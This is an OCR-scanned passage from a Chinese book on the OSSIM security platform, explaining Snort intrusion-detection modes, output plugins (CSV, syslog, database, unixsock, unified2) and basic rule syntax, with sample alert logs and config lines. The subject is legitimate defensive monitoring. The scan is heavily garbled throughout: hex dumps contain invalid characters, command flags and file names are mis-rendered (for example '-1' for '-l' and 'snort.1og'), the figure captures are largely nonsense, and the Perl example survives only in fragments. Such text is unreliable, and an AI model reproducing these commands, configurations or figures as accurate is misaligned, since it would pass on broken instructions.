7E 98 DA 15 0A 27 FD BS 64 F2 90 71 25 61 80 3F ? 
09 38 01 SB B4 41 7C 63 BF CF DD 2E 4D 35 BA 16 
68 41 F5 31 1D 51 2A F7 04 8E FO 42 D2 8E FS 78 
11 26 91 FC 00 54 E7 10 71 6F C8 C4 18 1D 84 C6 
04 73 F2 1F 9F EB AF 53 AS SB ED F2 5B 14 46 1A 


如 果 要 查看 数据 链 路 层 的 包头 信息 ， 输 入 “snort -vde" : 
#snort -vde 


命令 执行 结果 如 下 : 


Decoding Ethernet 


---- Initialization Complete ==-- 


p -*» Snort! «*- 
o" )- Version 2.9.0.4 (Build 111) 
'''! By Martin Roesch 5 The Snort Team: http://www.snort.org/snort/snort-team 
Copyright (C) 1998-2011 Sourcefire, Inc., et al. 
Using libpcap version 1.1.1 
Using PCRE version: 7.6 2008-01-28 使 用 MAC 地 址 表示 
Using ZLIB version: 1.2.3.3 


Commencing packet processing (pide10471) 
07/09-14:45:38.582467 :1 
10.32.14.1 


z type:0x200 len:0x266 

-> 10.32.14.131:64648 TCP TIL:64 TOS: 6 1D:19247 IpLen:20 DgmLen:600 
***AP*** Seq: Ox76F6006E Ack: Ox3AASBSD2 Win: 0x15 TcpLen: 20 

D3 B6 00 47 A4 EA 98 SA 71 46 93 BA 78 14 1F RE . 
DB 24 41 Fl 74 AS DA BC 4A 63 DE 32 7F BE AS Fe 
9E S4 B9 A7 OD 73 FO F1 DA CC SD FD A3 19 A3 47 


还 有 一 个 类 似 “-d” 参 数 ，“-X” 会 从 数据 链 路 层 开始 输出 原始 数据 包 。 
如 果 将 Snort 作为 IDS 使 用 ， 不 建议 在 命令 行 下 使 用 “-vd”， 尤其 是 “-ved” 参 数 ， 因 为 
详细 模式 将 数据 包 信息 打印 到 控制 台 ， 这 样 严 重 影响 Snort 的 性 能 ， 并 很 容易 引起 丢 包 。 


(2) 数据 包 记录 模式 
如 果 想 把 数据 信息 记录 到 磁盘 上 的 某 个 文件 那 就 需要 使 用 Packet logger( 包 记录 ) 模式 。 
命令 如 下 : 
#snort -ved -1 ./log 


这 时 Snort 会 把 数据 链 路 层 TCP/IP 报头 及 应 用 层 信息 写 入 当前 目录 log(log 目录 已 建立 ) 
下 的 snortlog.140493321 文件 中 ， 而 且 文 件 格式 为 二 进 制 文件 。 你 也 许 会 问 ，ASCII 格式 的 日 
志文 件 格式 非常 好 识别 ， 为 什么 不 直接 记录 成 ASCII 格式 呢 ? 因为 系统 本 身 记 录 的 格式 就 是 
二 进 制 的 ， 如 果 再 转换 成 我 们 能 识别 的 ASCII 格式 无 疑 会 加 重 系统 负荷 ， 所 以 Snort 在 做 IDS 
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使 用 时 ， 应 采用 二 进 制 格式 记录 ， 另 外 还 要 注意 : “-1” 参 数 是 小 
如 果 想 查看 所 rn ] 志 ， 就 得 使 用 “r” 参 数 ， 操 作 实例 如 下 : 


#snort -dvr snort.1og.140493321 


还 可 以 提取 部 分 感 兴趣 的 数据 ， 例 如 只 读 取 ICMP 包 ， 输 入 如 下 命令 : 
#snort -dvr snort.10g.140493321 icmp 

只 读 取 tcp 包 ， 输 入 如 下 命令 : 

#snort -dvr snort.10g.140493321 tcp 

如 果 想 记录 某 个 网 段 的 数据 呢 ， 操 作 命令 如 下 : 

# snort -vde -1 ./log -h 10.32.14.0/24 


， 环 境 为 OSSIM 3.1, Sfi 


下 面 进行 比较 复杂 的 示 如 图 6-12 所 示 。 
首先 在 


#snort -1 /var/log/snort/ -c /etc/snort/snort.eth0.conf 


E 


台 上 局 动 snort: 


当 需 要 结束 命令 时 按 下 Ctrl+C 组 合 键 ， 收 到 警报 如 图 6-13 所 示 。 


13406 
10678 


Munber of patterns ed to 20 bytes: 3506 1 
pcap DAQ configure sive 
c fron “ethO" 


"d, thread Oxb458bb90 (19018) 


//wuu .snort .org/snort/snort-tean 
，et al 
Using libpc 
Using PCRE : 28 A 18 ( 0.004) 
18 ( 0 
o 
E Version 1.13 <Build 18. c it: [] 
«Bui 1d M 0 
Build L Í M 
Build 9 Lo 


Build 1 401736 


<Build 3> 


图 6-12 ”记录 某 网 段 数据 图 6-13 收 到 Alerts 


Alerts 数量 就 是 在 日 志 里 看 到 的 记录 数量 ， 这 两 者 一 致 。 
在 另 一 个 控制 台 查 看 日 志 情 况 。 
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Jul 14 22:58:22 alienvault snort: [1:2008425:9] ET TROJAN Suspicious User-Agent (HITP Downloader) [Classification: A Network Trojan was Dete 
3719 -> 112.90.17.159:8080 

Jul 14 22:58:22 alienvault snort: [1:2008428:9] ET TROJAN Suspicious User-Agent (HTTP Downloader) [Classification: A Network Trojan was Dete 
3720 -> 112.90.17.159:8080 

Jul 14 22:58:30 alienvault snort: [1:2009967:5] ET PZP eMule KAD Network Connection Request [Classification: Potential Corporate Privacy Vio 
120508 -> 88.137.82.81:32047 

Jul 14 22:58:38 alienvault snort: [1:2014703:7] ET DNS Non-DNS or Non-Compliant DNS traffic on DNS port Reserved Bit Set - Likely 

Kazy [Classification: Potential Corporate Privacy Violation] [Priority: 1] (UDP) 10.32.14.131:20508 -> 194.2.0.20:53 

Jul 14 22:58:40 alienvault snort: [1:2009968:4] ET P2P eMule KAD Network Connection Request(2) [Classification: Potential Corporat 

e Privacy Violation] [Priority: 1] {UDP} 10.32.14.131:20508 -> 90.175.46.181:50504 

alienvault CRON[17977]: pam unix(cron:session): session opened for user root by (uid=0) 

alienvault CRON[17979]: pam unix(cron:session): session opened for user root by (uid=0) 

alienvault CRON[17979]: pam unix(cron:session): session closed for user root 

alienvault CRON[17977]: pam unix(cron:session): session closed for user root 

alienvault snort: [1:2009968:4] ET P2P eMule KAD Network Connection Request(2) [Classification: Potential Corporat 

e Privacy Violation] [Priority: 1] {UDP} 10.32.14.131:20508 -> 173.73.28.174:7128 

Jul 14 22:59:12 alienvault snort: [1:2009968:4] ET P2P eMule KAD Network Connection Request(2) [Classification: Potential Corporat 

e Privacy Violation] [Priority: 1] {UDP} 10.32.14.131:20508 -> 1.34.33.40:5672 

Jul 14 22:59:30 alienvault snort: [1:2009970:4] ET P2P eMule Kademlia Hello Request [Classification: Potential Corporate Privacy V 

iolation] [Priority: 1] (UDP] 10.32.14.131:20508 -> 86.202.198.33:35624 

Jul 14 22:59:30 alienvault snort: [1:2009970:4] ET P2P eMule Kademlia Hello Request [Classification: Potential Corporate Privacy V 

iolation] [Priority: 1] (UDP) 10.32.14.131:20808 -> 60.16.12.103:14670 

Jul 14 22:59:30 alienvault snort: [1:2009970:4] ET P2P eMule Kademlia Hello Request [Classification: Potential Corporate Privacy V 

iolation] [Priority: 1] (UDP] 10.32.14.131:20508 -> 125.87.45.224:18354 

Jul 14 22:59:30 alienvault snort: [1:2009970:4] ET P2P eMule Kademlia Hello Request [Classification: Potential Corporate Privacy V 

iolation] [Priority: 1] (UDP) 10.32.14.131:20508 -> 79.2.52.82:4672 

Jul 14 22:59:30 alienvault snort: [1:2009970:4] ET P2P eMule Kademlia Hello Request [Classification: Potential Corporate Privacy V 

iolation] [Priority: 1] (UDP] 10.32.14.131:20508 -> 124.64.58.147:2650 


此 时 ， 我 们 可 以 在 SIEM 控制 台中 看 到 如 图 6-14 所 示 。 


diam s 

|L ome femme [ERN semot | saree | 
2014-07-14 23:04:34 — ossec IDS event, o ossec-ds ahenvauit Host-10-32-14-131 alienvault-alienvauit. 
2014-07-14 23:03:35 snort "ET P2P eMule Kademila Hello Request" o snot alienvauit Host-10-32-14-131:20508 27.155 180.32:23362 lll 
201407-14230335 snort "ET P2P eMule Kademla He#o Request = 0 snot alenvaut Host10.32-14.131.20508 — T9 119 EOS MTS 
20140714230335 — stor “ET P2P eMule Kagemia Helo Request — 0 snot ahenvaut ——— Host10.32.14.13120508 186 1342521013767 局 
2014-07-14230335 snort "ET P2P eMule Kademla Heso Requesr — 0 snot ahenvaut —— Host10.32.14.13120508 。 8156747531530 
20140714230335 snort "ET P2P eMule Kadomia Heto Request — 0 snot aenvaunl Host-10.32.14.13120508 。 8256186140 4672 LI 
2014-07-14225930 ossec IDS event, o ossecads alienvauit Host-10-32-14-131 alienvault-alienvault. 
201407-4225930 ossec: IDS event, o ossecids aenvau Host10.32.14.131 aliena alenvaut 
2014074225930 ossec: IDS event o ossecids alenvaut Host-10.32-14.131 alenvauitalienvaut 
2014-07-14 2259:30 ossecids. allenvaut Host-10.32-14-131 allenvautalienvaut 
2014-07-14 2259:30 ossecids alenvaut Host-10-32-14-131 alenvautt alenvaut 
2014-07-14 2259:14 snot alienvautt Host-10-32-14-131:20508 — 1737328.1747128 15] 
2014-07-14 22:59:14 snot alienvauit Host-10-32-14-131-20508 1.3433.40:5672 国 
2014-07-14 22.5912 ossecids alenvaut Host-1032-14-131 alienvautt-alenvaut 
2014-07-14 2259:12 ossecads. alienvauit Host-10-32-14-131 alienvautt-alienvauit 


614 SIEM 控制 台 


(3) HIDS 模式 
HIDS 是 大 家 需要 掌握 的 重点 ， 这 种 模式 集成 了 嗅 探 模式 和 日 志 模式 ， 并 且 需 要 载 入 规则 
库 才能 正常 工作 。 操 作 方式 如 下 : 
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1 当前 目录 下 有 log 目录 ， 如 果 指 定 了 “-1.log” 参数， 系统 会 默认 将 日 志 存在 /varlog/snort/ 
| 目录 下 。snort.conf 文件 中 还 包含 了 指定 检测 规则 的 具体 路 径 。 


6.3.2 ”输出 插件 

输出 插件 的 作用 是 将 报警 输出 到 屏幕 或 转 储 到 文件 。 所 以 对 Snort 而 言 ， 输 出 插件 为 系统 
的 瓶颈 ，Snort 本 身 能 对 封包 进行 快速 读 取 和 分 析 处 理 ， 但 是 试图 将 其 显示 输出 或 者 存储 到 数 
据 库 中 时 却 有 些 力不从心 。 如 何 将 Snort 日 志 记 录 到 一 个 指定 文件 呢 ? 我 们 通过 执行 以 下 命令 
(假设 /var/log/snort/yourfile 文件 存在 ) 来 记录 。 

#snort -L yourfile 


那么 ， 此 时 系统 自动 将 snort 日 志保 存 到 /var/log/snort/yourfile 文件 中 。 后 续 文 章 我 会 给 大 
家 一 个 方法 配置 Snort 统一 格式 输出 并 且 有 Snort 的 标准 日 志 应 用 Barnyard 负责 输出 的 方法 
这 里 我 们 先 看 看 Snort 的 输出 插件 。 

1. -A alert-mode 

在 Snort 入 侵 检 测 模式 中 alert-mode 包括 fast, full; unsock 和 none 4 种 模式 。 


(1) fast 
fast 是 一 种 快速 简单 的 输出 插件 之 所 以 快 是 因为 它 只 记录 Timestamp OJER) Signature 
(特征 )、Source IP, DestinationIP, Source port, Destination port, TCP flags 和 Protocol。 使 用 
方法 如 下 : 
#snort -A fast 


alienvault:-/log/logé snort -A fast |more 
Running in packet durp mode 


--== Initializing Snort ==-- 
Initializing Output Plugins! 
pcap DAQ configured to passive. 
Acquiring network traffic from "eth0". 
Decoding Ethernet 


--22 Initialization Complete 一 一 


z -*» Snort! «*- 
o" )~ Version 2.9.0.4 (Build 111) 
'''* BY Martin Roesch & The Snort Team: http://www.snort.org/snort/snort-team 
Copyright (C) 1998-2011 Sourcefire, Inc., et al. 
Using libpcap version 1.1.1 
Using PCRE version: 7.6 2008-01-28 
Using ZLIB version: 1.2.3.3 


Commencing packet processing (pid-4444) 

07/09-17:20:31.452368 10.32.14.133:22 -» 10.32.14.131:64648 

TCP TIL:64 IOS:0x10 ID:44794 IpLen:20 DgmLen:600 DF 

***AP*** Seq: Ox7993ABBE Ack: Ox3AAFA4B2 Win: Ox2C TcpLen: 20 
=1=+=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=+=1=+=+ 
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数 ， 黑 认 保存 位 置 是 


上 面 的 命令 不 保存 到 文件 ， 如 果 希 望 保存 到 文件 〔 当 不 使 用 -1 
/var/log/snort/) ， 命 令 如 下 : 


#snort -A fast -h 10.32.14.0/24 -c /etc/snort/snort.eth0.conf | 
J 


(2) full 

full 将 每 个 产生 警报 的 IP 解码 后 的 包 记 录 下 来 。 与 fast 不 同 的 是 , full 记录 的 更 全 面 。full 
为 预 设 告警 模式 。 

(3) unsock 

这 个 插件 的 作用 是 建立 一 个 UNIX 域 管道 并 向 它 发 送 和 警报。 当然 
进行 监听 ， 目 的 是 实时 接收 Snort 警报 数据 。 


#snort -A unsock 


他 进程 也 可 对 该 各 


(4) none 
这 个 插件 作用 是 关闭 警报 。 大 家 只 需 掌 握 “-A” 后 面 跟 的 4 个 参数 的 含义 ， 了 解 这 4 个 
参数 只 是 让 Snort 能 以 不 同 的 方式 报警 。 
2.tcpdump 格式 输出 
有 时 候 需要 将 Snort 日 志 输 出 成 tcpdump 文件 格式 的 包 ， 因 为 这 样 可 以 让 多 种 应 用 程序 和 
工具 读 取 tcpdump， 这 时 我 们 如 下 操作 (以 OSSIM 3.1 系统 为 例 ): 
(1) 编辑 snort.conf. 
#vi /etc/snort/snort.eth0.conf 
找到 390 行 ， 启 用 output log_tcpdump: tcpdump.log。 配 置 参数 如 图 6-15 所 示 。 
# unifiedz 
# Recommended for most installs 


# output unified2: filename snort ethO, limit 128, nostamp, mpls event types, ulan event types 
output unified2: filename snort eth0, limit 128 


4 Additional configuration for specific types of installs 
# output unified2: filename snort eth0, limit 128, nostamp 
# output unified2: filename snort eth0, limit 128, nostamp 


# syslog 
output alert_syslog: LOG_AUTH LOG_ALERT 


# logging to a csv file 
output alert csu: csu.out timestamp,msg,srcip,sport ,dstop,dport ,protoname, itype, icode 


# pcap 
output log tcpdump: tcpdump .1og 


图 6-15 输出 格式 参数 
(2) 保存 退出 ， 并 重启 Snort 服务 使 其 配置 生效 。 
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(3) 查看 tepdump.log. 
alienvault:/var/log/snortf& ls -1 
一 工 W 一 一 一 一 一 一 一 1 root adm 504 Jul 14 22:02 tcpdump.10g.1405389707 
ED EE 1 root adm 3410 Jul 14 22:45 tcpdump.10g.1405392066 
(4) CSV 格式 输出 。 
采用 CSV 格 式 的 目的 主要 考虑 向 其 他 数据 库 或 电子 表格 软件 输入 .CSVCComma Separated 
Value) 是 用 逗号 分 隔 值 的 ， 为 文本 文件 。CSYV 格式 可 以 记录 24 个 字段 ， 如 表 6-4 所 示 。 


表 6-4 规则 选项 关键 字 含 义 


序号 。 关键 字 作用 

| 1 | timestamp | mmg 

特征 码 名 称 

协议 

源 地 址 

Wn 

[s |a — [mms 

目标 端口 

| s [ene | 源 MAC 

| o [ens | 目标 MAc 

| 10 [eme | uxam 

1 tcpflags TCP 标志 位 

TCP 序列 号 

TCP ack 号 

TCP KJE 

tcp 窗口 值 

训 头 的 也 的 值 

ip Jih TOS 字段 的 值 

pis [ia [ikiwa 
数据 报 的 总 长 度 ， 包 括 数据 报头 和 数据 报 文 
IP EKE 
ICMP 类 型 
ICMP 代号 ， 默 认为 0 

23 icmpid ICMP Ji 3c IP 头 的 ID， 默 认 是 随机 的 

24 icmpseq ICMP ECHO 顺序 号 的 值 


实现 csv 格式 输出 时 , 首先 编辑 snort_eth0.conf 文件 , 在 其 中 添加 :output alert. csv: csv.out, 
后 面 默认 有 24 个 关键 字 ， 我 们 也 可 按 上 图 的 参数 输入 。 
查看 csv 输出 : 


alienvault:/var/log/snort# tail -f csv.out 
07/15-00:29:51.254425 ,"GPL SHELLCODE x86 inc ebx NOOP",,,,,,, 


339 


源 安全 运 维 平台 一 一 OSSIM 最 佳 实 践 


07/15-00:29:51.357178 ,"GPL SHELLCODE x86 inc ebx NOOP",,,,,,, 

07/15-00:29:54.541833 ,"ET P2P eMule Kademlia Hello Request",,,,,,, 

07/15-00:29:54.541846 ,"ET P2P eMule Kademlia Hello Request",,,,,,, 

07/15-00:31:55.606599 ,"ET DNS Non-DNS or Non-Compliant DNS traffic on DNS port 
Opcode 6 or 7 set - Likely Kazy",,,,,,, 


以 下 为 24 个 参数 全 部 启用 的 效果 。 默 认为 全 部 启用 ， 除 非 指定 具体 参数 。 
在 snort_eth0.conf 加 入 下 面 一 行内 容 。 


output alert csv: csv.out 


表示 将 表 6-4 中 所 列 24 个 参数 都 输出 到 csv.out 文件 中 下 面 我 们 查看 /varlog/snorty/csv.out 
的 内 容 : 


alienvault:/var/log/snorté tail -f /var/log/snort/csv.out 


07/15-02. 4.813791 „1,2009970, 4, "ET P2P eMule Kademlia Hello Request", UDP, 10.32.14.131, 20508, 112.86.42.91, 38655, 34:17:EB:99:4 
77,58:8 B: FF, 0x50, , , s p 64,0, 2506,66, 67584, ,, , 

07/15-02. 4.814402 ,1,2009970,4,"ET P2P eMule Kademlia Hello Request", UDP, 10.32.14.131,20508, 113.233.174.149, 57285, 34:17:EB:99: 
4C:77, 58 9:52:DB:FF, 0x50, , , , ,,64,0,2507, 66, 67584,,,, 

07/15-02. 4.813472 „1,2009970, 4, "ET P2P eMule Kademlia Hello Request", UDP, 10.32.14.131,20508, 115.239.80.6, 27402, 34:17:EB:99:4C: 
77,58:8 2:DB:FF, 0x50, , , , , , 64, 0,2505, 66, 67584, , , , 

07/15-02. 4.813795 „1,2009970, 4, "ET P2P eMule Kademlia Hello Request", UDP,10.32.14.131, 20508, 112.86.42.91, 38655, 34:17:EB:99:4C: 

2 


77,58:8l FF, 0x50, , , , ,,64,0,2506,66,67584,,,, 

07/15-02 .487186 ,1,2009970,4,"ET P2P eMule Kademlia Hello Request", UDP, 10.32.14.131,20508,118.232.160.24,17192,34:17:EB:99:4 
C:77,58:8D:09:52:DB:FF, 0x50, , , , , „64, 0,5346, 66, 67584, ,,, 

07/15-02:35:36.487335 ,1,2009970,4,"ET P2P eMule Kademlia Hello Request", UDP, 10.32.14.131,20508, 183. 44.145.219, 19364, 34:17:EB:99:4 
€:77,5 09:52:DB:FF, 0x50, , , , , ,64,0,5347,66,67584,,,, 

07/15-02:39:39.832498 ,1,2009970,4,"ET P2P eMule Kademlia Hello Request",UDP,10.32.14.131,20508,1.28,188,143,25379, 34:17 :EB:99:4C: 
77, 58:80:09. FF, 0x50, , , , ,,64,0,11026,66,67584, ,,, 

07/15-02:39:39.832506 ,1,2009970,4,"ET P2P eMule Kademlia Hello Request", UDP,10.32.14.131,20508,60.255.0.20,27915,34:17:EB:99:4C:7 
7,58:8D:09:52:DB:FF, 0x50, , , , s , 64, 0,11027, 66, 67584, s s, 

07/15-02:41:41.507703 „1,2009970, 4, "ET P2P eMule Kademlia Hello Request", UDP,10.32.14.131,20508,120.0.74.172,24144, 34:17:EB:99:4 
JB: FF, 0x50, , , , , ,64,0,13672, 66, 67584, ,,, 

07/15-02:42:42.342802 ,1,2009970,4,"ET P2P eMule Kademlia Hello Request",UDP,10.32.14.131,20508,79.18.120.234,38715,34:17:EB:99:4C 
177, 58:8D: DB:FF, 0x50, , , , , 64,0, 15064, 66, 67584, ,,, 


查看 SIEM 控制 台 输 出 。 当 设置 成 功 CSV 输出 后 ， 可 以 查看 OSSIM 3 系统 下 SIEM 控制 
台 的 日 志 输出 ， 如 图 6-16 所 示 。 


D — —P— — 


> Security Events (SIEM) — |. snort "ET DNS Nen-DNS or Non-Compiant — 20147.15003155 — alemaul  Host-10-32-14-131:20508 99 1942020531] 
> Raw Logs (Logger) DNS trafic on DNS port Opcode 6 or 7 sel - Likely 
» Vunerabiles KEEN 
a g C] 加 回回 加 加 加 加 snort “ET P2P eMule 2014.07.15 0029.55  alenvaut — Host-10.32-4-13120506 9 793545157 46720 M. 
Kadeniia Hello Request 
E] 加 回国 加 回回 加 snort "ET P2P eMve 2014-07-15 002955 alenraut -Hest-10-32-14-131:20508 9 7912502374672] I 
Kadenia Hello Request 
E] UBND ZI LZ snort "ET P2P eMule 2014-07-15 00:29:55 alenat — Host-1032-14-131:20508 f 119.119 185 30:14643 ll 
Kademia Hello Request 
0 加 回回 加 加 回 加 rort ET P2P eMule. 2014-07-15 00:29:55  alienvault — Hcst-10-32-14-13120508 9 125.11834.113:18816 国 
(——— Kadenlia Helo Request 
JO EB C A snort ET P2P eMule 2014.07-15 002955 aliemaut — Hcst-1032-14-131:20508 9 8651.17 1654672 [E] 
Kadenia Hello Request 
I. short "GPL SHELLCODE x86 inc ebr NOOP" 2014071002955. aenuut — 2102623217680008N  Host-10-32-14-131:55968 9 
了 E]. snort quot GPL SHELLCODE x86 nc ebx 2014071500295 — alennault 。 20026232 176800088]  Host-10-32-14-131:55968 (9 
NOOPSquot 
L C snort quot GPL SHELLCODE x86 he eb 2014.07-1500.2925 — alemaut 2182623217680000]  Host-10-32-14-131:55968 9 
NOoPsquot 
E] 回回 四 shELLCOoDE x86 NOOP 2014.07-15 0029.15 。 aienraul — 218.26232176.8000 国 Host-10-32-14-131:55968 f 


6-16 SIEM 控制 台 日 志 输 出 


经 过 以 上 实验 发 现 两 种 不 同 警报 方式 的 结果 都 相同 ， 很 显然 OSSIM 3 系统 的 SIEM 控制 
台 显 示 出 的 警报 更 人 性 化 。 
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(5) Syslog 输出 
Syslog 服务 器 能 从 各 种 服务 和 设备 〈 网 络 设备 ，Web 服务 器 等 ) 收集 日 志 信息 。 将 Snort 
警报 数据 写 入 Syslog 服务 器 对 于 分 析 网 络 入 侵 事 件 很 有 帮助 。 所 以 这 也 是 Snort 一 个 比较 重要 
的 插件 之 一 。 最 简单 方法 是 打开 snort_eth0.conf 将 384 行 的 output alert syslog: LOG AUTH 
LOG ALERT 这 行 启用 ， 并 重启 Snort 即 可 生效 。 我 们 使 用 如 下 命令 观察 Snort 发 出 的 警报 : 


#tail -f /var/log/auth.log 


Syslog 有 三 个 配置 选项 ; 


€ facility 
© priority 
© options 


启用 选项 的 命令 是 在 上 面 命令 的 基础 上 加 上 这 3 个 参数 。 


output alert syslog: LOG AUTH LOG ALERT facility priority options 

保存 退出 并 重启 Snort BPEJ o 

这 时 ， 如 果 启 用 csv 输出 模式 ， 可 以 将 Syslog 和 csv 输出 做 个 对 比 ， 如 图 6-17 所 示 ， 图 
中 上 部 分 为 csv 输出 ， 下 部 分 为 auth.log 输出 。 


07/15-01:30:06.418892 ,1,2001298,9,"ET P2P eDonkey Server Status Request",UDP,10.32.14.131,15005,194.30.160.41, 
4665,34:17:EB:99:4C:77,58:8D:09:52:DB:FF, 0x3C, , ,, , , 64,0, 31896, 34, 34616, , , , [ 


Connected to 10,32.14.133 SSH2 - aes128-cbc - hmac-md5 | 111x19 | | 1 NUM 


Jul 15 01:30:06 alienvault snort[15940]: [1:2001298:9] ET P2P eDonkey Server Status Request [Classification: Pote |E 
ntial Corporate Privacy Violation] [Priority: 1] {UDP} 10.32.14.131:15005 -> 194.30.160.41:4665 
Jul 15 01:30:07 alienvault CRON[16442]: pam unix(cron:session): session closed for user munin 


Connected to 10.32.14.133 SSH2 - aes128-cbc - hmac-md5 | 113x49 zl INUM ; 
图 6-17 输出 结果 比较 


我 们 发 现 ， 同 样 一 个 攻击 事件 的 报警 ， 在 它们 的 输出 中 ， 除 了 格式 不 统一 以 外 ， 其 他 都 
相同 。 


(6) 数据 库 输出 

利用 数据 库 输出 插件 可 以 将 日 志保 存 到 数据 库 中 ， 它 支持 MySQL。 当 数据 库 插 件 被 关联 
到 数据 库 后 ， 就 可 以 实现 对 Snort 报警 进行 分 类 、 查 询 和 按 优 先 级 组 织 排序 ， 甚 至 利用 应 用 程 
序 对 数据 库 中 的 告警 数据 通过 GUI 界面 展现 给 用 户 。 

在 千 兆 网 络 环境 下 需要 考虑 性 能 问题 ， 数 据 库 插件 有 可 能 影响 到 Snort 性 能 ， 插 件 自身 并 
不 是 瓶颈 ， 当 大 量 数据 写 入 数据 库 时 ， 必 须 等 待 磁盘 IO 响应 ， 这 时 就 会 受到 影响 。 如 果 通 过 
网 络 将 日 志 转 发 到 另 一 台 主 机 的 数据 库 中 ， 那 么 延迟 会 比较 大 。 后 面 我 们 会 采用 
Barnyard+Unified 的 方式 解决 这 种 性 能 问题 。 
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解决 这 种 性 能 问题 的 主要 思路 是 让 Snort 采用 Unified 的 格式 存储 ， 以 它 的 最 大 速度 处 理 
输出 数据 ， 而 不 是 像 传统 方式 要 等 到 写 盘 完成 后 ， 再 继续 操作 ， 这 样 浪费 了 大 量 的 时 间 。 
Barnyard 能 将 二 进 制 数 解 析 成 与 它 能 够 识别 的 格式 ， 并 且 是 完全 独立 于 Snort 运行 。 警 报 被 立 
刻写 入 数据 库 , 并且 不 影响 Snort 的 抓 包 能 力 。 所 以 说 这 种 组 合适 合 于 大 流量 环境 ，OSSIM 环 
境 配置 如 图 6-18 所 示 。 我 们 还 是 查看 /etc/snort/snort.eth0.conf 配置 文件 ， 大 约 392 行 的 位 置 。 


B92 # database 
B93 # output database: alert, «db type», user-«username? password-4passuord? test dbname-4name? hosti 


-Xhostnane» 
B94 # output database: log, «db type», user-Xusernanme? passuord-4passuord? test dbname-4name? host-«| 


hostname» 


图 6-18 数据库 输 出 配置 


此 处 有 两 个 重要 的 选项 , 分 别 是 alert 和 log. 393 行 可 以 选择 将 警报 数据 写 入 数据 库 ，394 
行 可 以 同时 将 日 志 数 据 也 写 入 数据 库 。 下 面 我 们 看 看 如 何 使 用 数据 库 插 件 ， 对 照 上 面 参数 配置 
如 下 选项 ; 

€ db type> 为 mysql. 

€  User--username» 7) snortdb username 或 者 为 Snort 传感器 创建 的 MySQL 用 户 名 。 

€  Password--password» 为 snortdb password 或 为 Snort 传感器 创建 snortdb. username 

的 MySQL 口令 。 
€ Dbname=<name> 为 snortdb 或 者 自己 指定 的 入 侵 数 据 库 名 称 。 
€ Host=<hostname> 为 本 机 环 路 地 址 127.0.0.1. 


(7) 输出 unixsock 

通过 Alert_unixsock 打开 UNIX 套 接 字 ， 并 且 把 报警 信息 发 送 到 那里 。 外 部 的 程序 / 进程 
会 在 这 个 套 接 字 上 侦 听 并 实时 接收 这 些 报警 数据 。 

例子 : 

output alert unixsock 


加 入 到 snort.eth0.conf 配置 文件 后 ， 重 启 Snort 服务 即 生 效 。 也 可 以 通过 以 下 命令 手动 启 


动 : 


# snort -c /etc/snort/snort.eth0.conf 


此 时 会 在 /var/log/snort/ 下 产生 snort alert 文件 ， 配 置 如 图 6-19 所 示 。 


adm 
adm 
adm 
adm 
adm 
adm 
adm 
adm 


‘PHPPPPPPp 


图 6-19 snort alert 
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为 了 演示 这 一 功能 ， 我 们 通过 一 小 段 程序 〈 功 能 是 本 地 进程 间 的 通信 来 看 看 效果 如 何 。 
如 图 6-20 所 示 ， 是 一 段 Perl 脚本 ， 其 主要 功能 是 将 Snort 传送 的 数据 报 文 的 报警 名 称 通过 读 
取 unixsock 信息 实现 打印 到 屏幕 。 


了 


|! Include the socket libraries 


t gracefully 
sub { exit 0 X; 


UNIX->new( Typ 


r/log/sn 


ent ,$data, 10; 
unpack(STEN 
t "eFIELDS n; 


|t At termination close up 
(unl ink 


图 6-20 脚本 


执行 该 Perl 程序 ， 结 果 如 图 6-21 所 示 。 我 们 看 到 显示 在 屏幕 上 出 现 了 5 条 警报 。 


He 


a He 


eMule Kademlia He 
eMule ml ia He 
ET P2P eMule Kademlia He 


图 6-21 运行 演示 


(8) Unified 格式 输出 

前 面 介 绍 了 多 种 输出 插件 ， 它 们 各 有 利 尊 ， 下 面 介绍 OSSIM 系统 中 常用 的 unified 插件 。 
这 种 插件 的 最 大 特点 是 速度 快 ， 它 能 快速 输出 Snort 报警 信息 和 日 志 信息 。 它 输出 两 类 文件 : 
警报 文件 和 数据 包 日 志文 件 ， 警 报 文件 仅 记 录 摘 要 信息 〈 内 容 包 括 源 IP. Hif] IP、 协 议 、 源 
端口 、 目 的 端口 、 报 警 消息 ID)， 日 志文 件 包含 完整 的 包 信息 ， 用 户 可 以 自行 下 载 。 

设置 方法 是 启用 以 下 配置 语句 : 


Output unified2: filename snort eth0, limit 128 


Filename 后 设置 输出 警报 文件 名 称 为 snort_eth0。 
Limit 代表 输出 文件 允许 的 最 大 长 度 ， 默 认 值 为 128MB。 


Snort 规则 编写 


Snort 规则 特征 库 中 的 每 条 规则 都 对 应 一 条 网 络 攻击 的 特征 ，Snort 通过 攻击 特征 来 识别 
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开源 安全 运 维 平台 一 一 OSSIM 最 佳 实践 


网 络 发 生 的 攻击 行为 ， 大 家 在 能 够 看 懂 Snort 规则 的 基础 上 才能 进行 修改 。 本 节 我 们 讲解 分 析 
规则 的 基础 知识 。 


6.4.1 Snot 规则 分 析 

Snort 规则 库 中 的 每 条 规则 都 对 应 于 一 种 入 侵 方式 ， 每 条 规则 由 规则 头 和 规则 体 选 项 组 
成 。 规 则 头 包含 有 匹配 的 行为 动作 、 协 议 类 型 、 源 IP 及 端口 、 数 据 包 方向 、 目 标 卫 及 端口 ; 
规则 选项 则 包含 报警 信息 、 内 容 选项 等 ， 规 则 选项 是 规则 匹配 的 核心 部 分 。 如 下 面 所 示 的 一 条 
简单 的 规则 , 括号 外 面 的 部 分 是 规则 头 部 , 括号 里 面 的 部 分 是 规则 选项 。 注意: 本 节 所 有 Snort 
规则 在 OSSIM 系统 中 均 可 找到 代码 。 


alert icmp $EXTERNAL NET any -> $HOME NET any (msg:"ICMP PING NMAP"; dsize:0; 
itype:8; reference:arachnids,162; classtype:attempted-recon; sid:469; rev:3;) 


刚 看 到 这 段 代 码 感觉 很 复杂 ， 下 面 解释 一 下 这 段 代 码 的 含义 : 如 果 检 测 到 ICMP &, 不论 
是 来 自 SEXTERNAL _ NET 被 定义 为 (default = any) 或 SHOME_NET 被 定义 为 (default=any)， 
只 要 数据 大 小 (dsize) 是 0 并 且 ICMP 类 型 itype 是 8 (表示 回应 request)， 就 发 出 告警 。 除 了 
告警 还 包括 审查 功能 。 在 snort.conf 中 有 两 个 是 用 来 指定 监听 网 络 的 参数 ; 


(1) var HOME NET any， 用 来 指定 网 络 监听 界面 ， 默 认 的 any 代表 任何 一 个 本 机 网 络 
界面 都 监听 。 

